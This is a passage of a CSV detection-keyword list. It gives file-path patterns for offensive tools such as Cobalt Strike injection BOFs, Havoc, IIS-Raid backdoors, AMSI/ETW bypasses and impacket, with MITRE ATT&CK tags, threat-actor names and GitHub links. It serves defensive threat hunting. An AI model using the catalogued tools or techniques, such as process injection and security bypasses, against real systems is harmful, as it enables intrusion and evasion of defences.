- T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ielocalserver.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/ieshell32.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/iis_controller.py*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" +"*/IIS-Raid.git*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" +"*/ike-crack.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/IKEForce*","offensive_tool_keyword","IKEForce","IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.","T1110 - T1201 - T1018","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/SpiderLabs/ikeforce","1","0","N/A","N/A","3","226","73","2019-09-18T09:35:41Z","2014-09-12T01:11:00Z" +"*/ike-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/imap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/imap-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/imap-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/imfiver/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/imfiver/CVE-2022-0847","1","1","N/A","N/A","3","257","74","2023-02-02T02:17:30Z","2022-03-07T18:36:50Z" +"*/impacket.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/impacket/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/impersonate.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/impersonate-rs*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*/imperun * *cmd.exe /c whoami*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*/Imperva_gzip_WAF_Bypass*","offensive_tool_keyword","Imperva_gzip_WAF_Bypass","Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. directory traversal. XXE. etc.","T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/BishopFox/Imperva_gzip_WAF_Bypass","1","1","N/A","N/A","2","146","29","2022-01-07T17:39:29Z","2022-01-07T17:38:33Z" +"*/implant/callback*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*/implant/elevate/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/implant/register_cmd*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*/implants/*/Syscalls.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/ImplantSSP.exe*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/impress-remote-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/inceptor.git*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/inceptor.git*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/infection_monkey/*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/Infoga*","offensive_tool_keyword","Infoga","Email Information Gathering.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/m4ll0k/Infoga","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*/informix-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/informix-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/informix-tables.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/inject.cpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/Inject/Dll/LoadDll*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*/Inject/PE/*.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*/Inject/ShellCode/*.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*/injectAmsiBypass/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","363","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" +"*/inject-assembly/*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" +"*/injectEtw.*","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","10","10","253","54","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z" +"*/Injection/clipboard/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/conhost/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/createremotethread/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/ctray/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/dde/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/Injection.cna*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/kernelcallbacktable*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 